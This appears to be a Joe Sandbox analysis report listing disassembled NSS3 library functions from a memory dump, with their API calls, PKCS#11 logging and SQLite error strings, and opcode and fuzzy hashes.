Part of subcall function 6C6D1240: PR_Unlock.NSS3(?,?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D12A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C726CAA

Strings

rdb:, xrefs: 6C726C69
dbm:, xrefs: 6C726C3A
sql:, xrefs: 6C726C52
NSS_DEFAULT_DB_TYPE, xrefs: 6C726C91
extern:, xrefs: 6C726C7E
dbm, xrefs: 6C726CA4

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: cc8a1fdc82ab069744db2556d5704255baad9db7fb611dbc47f86e812b2c9403
Instruction ID: 137913e67cc23f4c84944d79668086e50b2f45248823b157e21158442e192662
Opcode Fuzzy Hash: cc8a1fdc82ab069744db2556d5704255baad9db7fb611dbc47f86e812b2c9403
Instruction Fuzzy Hash: 3301D4A170A31167E73036BA9E4DF12354C9F4225DF140932FE08E0AC2EA9AF65480E9

Function 6C734E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C6F78F8), ref: 6C734E6D

Part of subcall function 6C6D09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6D06A2,00000000,?), ref: 6C6D09F8
Part of subcall function 6C6D09E0: malloc.MOZGLUE(0000001F), ref: 6C6D0A18
Part of subcall function 6C6D09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C6D0A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C6F78F8), ref: 6C734ED9

Part of subcall function 6C725920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C727703,?,00000000,00000000), ref: 6C725942
Part of subcall function 6C725920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C727703), ref: 6C725954
Part of subcall function 6C725920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C72596A
Part of subcall function 6C725920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C725984
Part of subcall function 6C725920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C725999
Part of subcall function 6C725920: free.MOZGLUE(00000000), ref: 6C7259BA
Part of subcall function 6C725920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7259D3
Part of subcall function 6C725920: free.MOZGLUE(00000000), ref: 6C7259F5
Part of subcall function 6C725920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C725A0A
Part of subcall function 6C725920: free.MOZGLUE(00000000), ref: 6C725A2E
Part of subcall function 6C725920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C725A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C734EB3

Part of subcall function 6C734820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C734EB8,?,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C73484C
Part of subcall function 6C734820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C734EB8,?,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C73486D
Part of subcall function 6C734820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C734EB8,?), ref: 6C734884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C734EC0

Part of subcall function 6C734470: TlsGetValue.KERNEL32(00000000,?,6C6F7296,00000000), ref: 6C734487
Part of subcall function 6C734470: EnterCriticalSection.KERNEL32(?,?,?,6C6F7296,00000000), ref: 6C7344A0
Part of subcall function 6C734470: PR_Unlock.NSS3(?,?,?,?,6C6F7296,00000000), ref: 6C7344BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C734F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C734F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C734F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C734F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C734F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C734F8F
PK11_UpdateSlotAttribute.NSS3(?,6C80DCB0,00000000), ref: 6C734FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C73501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C6F78F8), ref: 6C73506B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 60e1d10a78de40fd7138c2df8771f244f8ce5dad13e9566ea1a41231a8298ec1
Instruction ID: a8b603822f86e0ecbc719c1d099f9c8f49c7883de3132cd20ddbb8c1148771ff
Opcode Fuzzy Hash: 60e1d10a78de40fd7138c2df8771f244f8ce5dad13e9566ea1a41231a8298ec1
Instruction Fuzzy Hash: FC51E4B1A002119BDB11AF34EE09A9B3AB4FF0531CF185635EC0E96A12F736E515C6D2

Function 6C6DACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6DACE2
malloc.MOZGLUE(00000001), ref: 6C6DACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6DAD02
TlsGetValue.KERNEL32 ref: 6C6DAD3C
calloc.MOZGLUE(00000001,?), ref: 6C6DAD8C
PR_Unlock.NSS3 ref: 6C6DADC0
free.MOZGLUE(00000000), ref: 6C6DAE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6DAE58
free.MOZGLUE(00000000), ref: 6C6DAE69
free.MOZGLUE(?), ref: 6C6DAE78
PR_Unlock.NSS3 ref: 6C6DAE8C
free.MOZGLUE(?), ref: 6C6DAEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6DAEC7

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 40ea7423a8477e79f97c375c86a80eeef60e2bba469d0442c98a2604295e2ec9
Instruction ID: cd4867dcf1aa207bef99b22ad452c7ebc9c77c43ace9270edab5eb67a8591d3c
Opcode Fuzzy Hash: 40ea7423a8477e79f97c375c86a80eeef60e2bba469d0442c98a2604295e2ec9
Instruction Fuzzy Hash: 2751B0B0A052168BDF20EFA8D8456AE77B4BB0634DF164535D808A3B12D331FD15CBEA

Function 6C71ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C71ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C71AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C71AE29

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C71AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C71AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C71AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C71AEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6C71AE1F, 6C71AE80
hSession = 0x%x, xrefs: 6C71AE01, 6C71AE11
hKey = 0x%x, xrefs: 6C71AE62, 6C71AE72
C_MessageSignInit, xrefs: 6C71ADE1

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 2dc1125f0903844680b91ee43cac972a848236cd56d0e3ca995c232765c76d7f
Instruction ID: d0f797e14852c00c0d90d13f5ce78aa46459a5689b4e8d51f11bc646ed9f0fee
Opcode Fuzzy Hash: 2dc1125f0903844680b91ee43cac972a848236cd56d0e3ca995c232765c76d7f
Instruction Fuzzy Hash: DF310731605104EBCB21EF14DE8DBAB37B9AB4672DF088434E419ABB11D734980DDBD6

Function 6C719EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6C719F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C719F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C719F49

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C719F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C719F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C719FAA
PR_LogPrint.NSS3(?,00000000), ref: 6C719FC0

Strings

(CK_INVALID_HANDLE), xrefs: 6C719F3F, 6C719FA0
C_MessageEncryptInit, xrefs: 6C719F01
hSession = 0x%x, xrefs: 6C719F21, 6C719F31
hKey = 0x%x, xrefs: 6C719F82, 6C719F92

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
API String ID: 332880674-1139731676
Opcode ID: d45325294ba416078cf9fed0217a4e92636f49f0f6ebb53fb87b6649f596a4d9
Instruction ID: 5fa5701146df3ada29aa8ccd011ab0eed0155ea1ae21bc45ed98c11449befdf1
Opcode Fuzzy Hash: d45325294ba416078cf9fed0217a4e92636f49f0f6ebb53fb87b6649f596a4d9
Instruction Fuzzy Hash: 1431D731609204ABDB20EF54DE8CBAE3779AB5631DF088434E41997F51E7349809D7D6

Function 6C7B4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C7B4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7B4CFD
sqlite3_value_text16.NSS3(?), ref: 6C7B4D44

Strings

out of memory, xrefs: 6C7B4C78, 6C7B4C9E
abort due to ROLLBACK, xrefs: 6C7B4D27, 6C7B4D33
no more rows available, xrefs: 6C7B4D2E
API call with %s database connection pointer, xrefs: 6C7B4CF6
unknown error, xrefs: 6C7B4D56
invalid, xrefs: 6C7B4CF1
bad parameter or other API misuse, xrefs: 6C7B4D05
another row available, xrefs: 6C7B4D20

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 59783685d10be7b18c1db6d72ccea2dec610f776e41e859cbc61a5bd001b855c
Instruction ID: 74253adfae3b2da1f08ecef8552dff1e802e66a03943af08e9f6c3f9518cb7b8
Opcode Fuzzy Hash: 59783685d10be7b18c1db6d72ccea2dec610f776e41e859cbc61a5bd001b855c
Instruction Fuzzy Hash: 36316673A08811A7D7280E24AB167A573A1BB8371CF550939D9247BF19CB30BC56E3E6

Function 6C712DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C712DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C712E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C712E33

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C712E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C712E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C712E81

Strings

(CK_INVALID_HANDLE), xrefs: 6C712E2C
pPin = 0x%p, xrefs: 6C712E63
hSession = 0x%x, xrefs: 6C712E0E, 6C712E1E
ulPinLen = %d, xrefs: 6C712E7C
C_InitPIN, xrefs: 6C712DF1

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: b5b2a28e58d954c4e1f36d1b9dff461af0e4334c0cb4a0614000548add8e6c4b
Instruction ID: bfa7d7af91903cac2a0c6455a7ab93e62ef82b40c5a215255179b22cf15a3a68
Opcode Fuzzy Hash: b5b2a28e58d954c4e1f36d1b9dff461af0e4334c0cb4a0614000548add8e6c4b
Instruction Fuzzy Hash: 5731E475605144ABDB20EB54DE8CB9B3BB9EB4331DF088434E808A7B11DB34A84DCBD2

Function 6C717E00 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6C717E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C717E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C717E63

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C717E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C717E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C717EB1

Strings

C_VerifyUpdate, xrefs: 6C717E21
pPart = 0x%p, xrefs: 6C717E93
(CK_INVALID_HANDLE), xrefs: 6C717E5C
ulPartLen = %d, xrefs: 6C717EAC
hSession = 0x%x, xrefs: 6C717E3E, 6C717E4E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate
API String ID: 1003633598-2508624608
Opcode ID: 21445306380f18c2742db06ba6c988433b97cceb6a90b63faaf11507aa62e112
Instruction ID: 3cd3da2e938368922798799f630340ac9a34bd2115071d98bf150c4ccdb89241
Opcode Fuzzy Hash: 21445306380f18c2742db06ba6c988433b97cceb6a90b63faaf11507aa62e112
Instruction Fuzzy Hash: F531A635A05154ABDB20AB54DE8CB5B3BB5EB4231DF088434E81897B11DB34AD09CBD5

Function 6C716EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C716F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C716F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C716F53

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C716F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C716F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C716FA1

Strings

C_DigestUpdate, xrefs: 6C716F11
pPart = 0x%p, xrefs: 6C716F83
(CK_INVALID_HANDLE), xrefs: 6C716F4C
ulPartLen = %d, xrefs: 6C716F9C
hSession = 0x%x, xrefs: 6C716F2E, 6C716F3E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: a4586d316c90a472a341bb7c2f60e749e700c53b5dbd02df02fdfac7e2dc02db
Instruction ID: 846323fd030b5f45603f592ceddd3e620c25cb452b4b0eca9761a81bb0246aa5
Opcode Fuzzy Hash: a4586d316c90a472a341bb7c2f60e749e700c53b5dbd02df02fdfac7e2dc02db
Instruction Fuzzy Hash: BD31D5346091149FDB20EB14DE8CB9A3BB5EB4231DF088434E818E7B11DB34E949CBD1

Function 6C717F30 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyFinal), ref: 6C717F56
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C717F84
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C717F93

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C717FA9
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C717FC8
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C717FE1

Strings

pSignature = 0x%p, xrefs: 6C717FC3
(CK_INVALID_HANDLE), xrefs: 6C717F8C
C_VerifyFinal, xrefs: 6C717F51
hSession = 0x%x, xrefs: 6C717F6E, 6C717F7E
ulSignatureLen = %d, xrefs: 6C717FDC

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pSignature = 0x%p$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_VerifyFinal
API String ID: 1003633598-3315179127
Opcode ID: d1f3fb2c3cfbfc29e11ca38cb625b9d6dbff9be6d9ea22a74afb72ea7a294dbf
Instruction ID: d48d2ecda8a52f4154b28fc72eaa93208050b7d949303814d98700b948894507
Opcode Fuzzy Hash: d1f3fb2c3cfbfc29e11ca38cb625b9d6dbff9be6d9ea22a74afb72ea7a294dbf
Instruction Fuzzy Hash: 4331B53560A154AFDB20EB14DE8CB5B7BB5EB4231DF098435E80897B11DB34A949CBE2

Function 6C7B2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C7B2D9F

Part of subcall function 6C66CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6CF9C9,?,6C6CF4DA,6C6CF9C9,?,?,6C69369A), ref: 6C66CA7A
Part of subcall function 6C66CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C66CB26

sqlite3_exec.NSS3(?,?,6C7B2F70,?,?), ref: 6C7B2DF9
sqlite3_free.NSS3(00000000), ref: 6C7B2E2C
sqlite3_free.NSS3(?), ref: 6C7B2E3A
sqlite3_free.NSS3(?), ref: 6C7B2E52
sqlite3_mprintf.NSS3(6C81AAF9,?), ref: 6C7B2E62
sqlite3_free.NSS3(?), ref: 6C7B2E70
sqlite3_free.NSS3(?), ref: 6C7B2E89
sqlite3_free.NSS3(?), ref: 6C7B2EBB
sqlite3_free.NSS3(?), ref: 6C7B2ECB
sqlite3_free.NSS3(00000000), ref: 6C7B2F3E
sqlite3_free.NSS3(?), ref: 6C7B2F4C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: c76028b1f0498a5fdfa24145dc1c0f3e5e0f289e72705f22ed4e3e704851f28f
Instruction ID: 880bb32d3d3d8e192de152bb5ff7e6b221b129e5e9f0b853fb0ac53296d41a3c
Opcode Fuzzy Hash: c76028b1f0498a5fdfa24145dc1c0f3e5e0f289e72705f22ed4e3e704851f28f
Instruction Fuzzy Hash: DB6180B5E022059BEB00CFA9D989B9EB7B5EF49348F144034EC15B7B01E735E845CBA5

Function 6C6F7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C842120,Function_00097E60,00000000,?,?,?,?,6C77067D,6C771C60,00000000), ref: 6C6F7C81

Part of subcall function 6C664C70: TlsGetValue.KERNEL32(?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664C97
Part of subcall function 6C664C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CB0
Part of subcall function 6C664C70: PR_Unlock.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CC9

TlsGetValue.KERNEL32 ref: 6C6F7CA0
EnterCriticalSection.KERNEL32(?), ref: 6C6F7CB4
PR_Unlock.NSS3 ref: 6C6F7CCF

